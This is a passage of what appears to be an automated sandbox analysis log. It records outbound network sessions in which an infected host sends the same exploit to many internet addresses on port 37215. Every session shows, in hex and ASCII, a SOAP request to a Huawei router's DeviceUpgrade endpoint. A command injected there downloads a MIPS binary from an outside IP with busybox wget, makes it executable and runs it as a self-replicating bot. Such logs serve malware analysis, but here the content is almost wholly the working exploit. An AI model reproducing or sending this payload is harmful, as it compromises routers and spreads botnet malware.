                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1728192.168.2.2350334197.55.223.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537419081 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1729192.168.2.2360188133.165.235.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537425995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1730192.168.2.235266065.119.31.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537448883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1731192.168.2.234950061.92.182.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537458897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1732192.168.2.2347478157.243.98.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537513018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1733192.168.2.235533041.155.236.17537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537525892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1734192.168.2.233753041.34.152.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537537098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1735192.168.2.2333646197.13.14.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537545919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1736192.168.2.2338822197.224.227.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537549973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1737192.168.2.2344324197.241.245.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537646055 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
